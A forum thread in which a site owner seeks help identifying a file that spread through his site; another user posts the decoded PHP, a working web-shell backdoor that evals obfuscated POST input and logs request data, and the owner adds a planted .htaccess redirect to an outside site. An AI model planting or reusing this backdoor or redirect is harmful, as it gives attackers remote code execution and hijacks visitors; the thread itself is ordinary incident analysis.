Hello all.
I had an attempt this morning to try and hijack my site. Luckily some users pointed it out before too many problems were had.
I've zipped up the file that had decided to spread onto my site, and was slowly injecting itself into every directory that it could get it's hands onto.
it's available at: http://pizzaboy192.com/default.zip
It's just a default.php file. It's small and I can't make heads or tails of it.
Thanks.
Help me identify this attempt to hijack my site.
Forum rules
Any off topic discussions should go in this forum. Post count is not increased by posting here.
Archive Access status is required to post in this forum. Find out how to get it
Any off topic discussions should go in this forum. Post count is not increased by posting here.
Archive Access status is required to post in this forum. Find out how to get it
-
pizzaboy192
- Posts: 2688
- Joined: Thu Oct 23, 2008 3:25 am
- Location: Earth.
- Contact:
Re: Help me identify this attempt to hijack my site.
I decoded it, and that's what it looks like:
Here are some mentions of it. Apparently this was made by Russians: http://wordpress.org/support/topic/cant ... ing-trojan
Code: Select all
@error_reporting(0);
@ini_set("display_errors",0);
@ini_set("log_errors",0);
@ini_set("error_log",0);
if (isset($_GET['r'])) {
print $_GET['r'];
} elseif (isset($_POST['e'])) {
eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e']))))));
} elseif (isset($_SERVER['HTTP_CONTENT_ENCODING']) && $_SERVER['HTTP_CONTENT_ENCODING'] == 'binary') {
$data = file_get_contents('php://input'); if (strlen($data) > 0) print 'STATUS-IMPORT-OK'; if (strlen($data) > 12) { $fp=@fopen('tmpfile','a'); @flock($fp, LOCK_EX); @fputs($fp, $_SERVER['REMOTE_ADDR']."\t".base64_encode($data)."\r\n"); @flock($fp, LOCK_UN); @fclose($fp); } } exit;Longhorn Packet 1.21 - Solves most of the problems with Longhorn Setup
[GUIDE] How to dump clean/untouched images from CD discs
Longhorn Music Album (FLAC) | 523.31 MB | 17 tracks | Donators Discussion Forum
[GUIDE] How to dump clean/untouched images from CD discs
Longhorn Music Album (FLAC) | 523.31 MB | 17 tracks | Donators Discussion Forum
-
pizzaboy192
- Posts: 2688
- Joined: Thu Oct 23, 2008 3:25 am
- Location: Earth.
- Contact:
Re: Help me identify this attempt to hijack my site.
ah. Wordpress issue. I had an old install tucked away. Time to remove that directory, and secure my other install.Pwned wrote:I decoded it, and that's what it looks like:
Here are some mentions of it. Apparently this was made by Russians: http://wordpress.org/support/topic/cant ... ing-trojanCode: Select all
@error_reporting(0); @ini_set("display_errors",0); @ini_set("log_errors",0); @ini_set("error_log",0); if (isset($_GET['r'])) { print $_GET['r']; } elseif (isset($_POST['e'])) { eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e'])))))); } elseif (isset($_SERVER['HTTP_CONTENT_ENCODING']) && $_SERVER['HTTP_CONTENT_ENCODING'] == 'binary') { $data = file_get_contents('php://input'); if (strlen($data) > 0) print 'STATUS-IMPORT-OK'; if (strlen($data) > 12) { $fp=@fopen('tmpfile','a'); @flock($fp, LOCK_EX); @fputs($fp, $_SERVER['REMOTE_ADDR']."\t".base64_encode($data)."\r\n"); @flock($fp, LOCK_UN); @fclose($fp); } } exit;
EDIT: Found this little gem in the .htaccess file in my /wordpress/ directory.
Code: Select all
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/$ [NC]
RewriteRule ^.*$ http://darwinawards.fr/wami.html?h=1318607 [L,R]
</IfModule>